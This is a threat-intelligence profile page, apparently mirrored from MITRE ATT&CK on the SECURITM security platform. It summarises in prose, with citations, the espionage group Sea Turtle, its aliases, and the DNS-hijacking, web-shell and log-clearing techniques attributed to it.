Куда я попал?
SECURITM это SGRC система, ? автоматизирующая процессы в службах информационной безопасности. SECURITM помогает построить и управлять ИСПДн, КИИ, ГИС, СМИБ/СУИБ, банковскими системами защиты.
А еще SECURITM это место для обмена опытом и наработками для служб безопасности.

Sea Turtle

Sea Turtle is a Türkiye-linked threat actor active since at least 2017 performing espionage and service provider compromise operations against victims in Asia, Europe, and North America. Sea Turtle is notable for targeting registrars managing ccTLDs and complex DNS-based intrusions where the threat actor compromised DNS providers to hijack DNS resolution for ultimate victims, enabling Sea Turtle to spoof log in portals and other applications for credential collection.(Citation: Talos Sea Turtle 2019)(Citation: Talos Sea Turtle 2019_2)(Citation: PWC Sea Turtle 2023)(Citation: Hunt Sea Turtle 2024)
ID: G1041
Associated Groups: SILICON, Teal Kurma, Marbled Dust, Cosmic Wolf
Created: 20 Nov 2024
Last Modified: 28 Mar 2025

Associated Group Descriptions

Name Description
SILICON (Citation: Microsoft Digital Defense 2021)(Citation: Hunt Sea Turtle 2024)
Teal Kurma (Citation: PWC Sea Turtle 2023)(Citation: Hunt Sea Turtle 2024)
Marbled Dust (Citation: PWC Sea Turtle 2023)(Citation: Hunt Sea Turtle 2024)
Cosmic Wolf (Citation: PWC Sea Turtle 2023)(Citation: Hunt Sea Turtle 2024)

Techniques Used

Domain ID Name Use
Enterprise T1583 .001 Acquire Infrastructure: Domains

Sea Turtle registered domains for authoritative name servers used in DNS hijacking activity and for command and control servers.(Citation: Talos Sea Turtle 2019_2)(Citation: Hunt Sea Turtle 2024)

.002 Acquire Infrastructure: DNS Server

Sea Turtle built adversary-in-the-middle DNS servers to impersonate legitimate services that were later used to capture credentials.(Citation: Talos Sea Turtle 2019_2)(Citation: Talos Sea Turtle 2019)

.003 Acquire Infrastructure: Virtual Private Server

Sea Turtle created adversary-in-the-middle servers to impersonate legitimate services and enable credential capture.(Citation: Talos Sea Turtle 2019)

Enterprise T1071 .001 Application Layer Protocol: Web Protocols

Sea Turtle connected over TCP using HTTP to establish command and control channels.(Citation: Hunt Sea Turtle 2024)

Enterprise T1560 .001 Archive Collected Data: Archive via Utility

Sea Turtle used the tar utility to create a local archive of email data on a victim system.(Citation: Hunt Sea Turtle 2024)

Enterprise T1059 .004 Command and Scripting Interpreter: Unix Shell

Sea Turtle used shell scripts for post-exploitation execution in victim environments.(Citation: PWC Sea Turtle 2023)(Citation: Hunt Sea Turtle 2024)

Enterprise T1584 .002 Compromise Infrastructure: DNS Server

Sea Turtle modified Name Server (NS) items to refer to Sea Turtle-controlled DNS servers to provide responses for all DNS lookups.(Citation: Talos Sea Turtle 2019)(Citation: Talos Sea Turtle 2019_2)

Enterprise T1074 .002 Data Staged: Remote Data Staging

Sea Turtle staged collected email archives in the public web directory of a website that was accessible from the internet.(Citation: Hunt Sea Turtle 2024)

Enterprise T1114 .001 Email Collection: Local Email Collection

Sea Turtle collected email archives from victim environments.(Citation: Hunt Sea Turtle 2024)

Enterprise T1564 .011 Hide Artifacts: Ignore Process Interrupts

Sea Turtle executed SnappyTCP using the tool NoHup, which keeps the malware running on a system after exiting the shell or terminal.(Citation: Hunt Sea Turtle 2024)

Enterprise T1562 .003 Impair Defenses: Impair Command History Logging

Sea Turtle unset the Bash and MySQL history files on victim systems.(Citation: Hunt Sea Turtle 2024)

Enterprise T1070 .002 Indicator Removal: Clear Linux or Mac System Logs

Sea Turtle has overwritten Linux system logs and unsets the Bash history file (effectively removing logging) during intrusions.(Citation: Hunt Sea Turtle 2024)

Enterprise T1027 .004 Obfuscated Files or Information: Compile After Delivery

Sea Turtle downloaded source code files from remote addresses then compiled them locally via GCC in victim environments.(Citation: Hunt Sea Turtle 2024)

Enterprise T1588 .002 Obtain Capabilities: Tool

Sea Turtle has used tools such as Adminer during intrusions.(Citation: Hunt Sea Turtle 2024)

.004 Obtain Capabilities: Digital Certificates

Sea Turtle created new certificates using a technique called the actors performed "certificate impersonation," a technique in which Sea Turtle obtained a certificate authority-signed X.509 certificate from another provider for the same domain imitating the one already used by the targeted organization.(Citation: Talos Sea Turtle 2019)(Citation: Talos Sea Turtle 2019_2)

Enterprise T1505 .003 Server Software Component: Web Shell

Sea Turtle deployed the SnappyTCP web shell during intrusion operations.(Citation: PWC Sea Turtle 2023)(Citation: Hunt Sea Turtle 2024)

Enterprise T1608 .003 Stage Capabilities: Install Digital Certificate

Sea Turtle captured legitimate SSL certificates from victim organizations and installed these on Sea Turtle-controlled infrastructure to enable subsequent adversary-in-the-middle operations.(Citation: Talos Sea Turtle 2019)

Enterprise T1078 .003 Valid Accounts: Local Accounts

Sea Turtle compromised cPanel accounts in victim environments.(Citation: Hunt Sea Turtle 2024)

Software

ID Name References Techniques
S1163 SnappyTCP (Citation: PWC Sea Turtle 2023) Unix Shell, Web Protocols, Asymmetric Cryptography, Web Shell, Non-Application Layer Protocol

Мы используем cookie-файлы, чтобы получить статистику, которая помогает нам улучшить сервис для вас с целью персонализации сервисов и предложений. Вы может прочитать подробнее о cookie-файлах или изменить настройки браузера. Продолжая пользоваться сайтом, вы даёте согласие на использование ваших cookie-файлов и соглашаетесь с Политикой обработки персональных данных.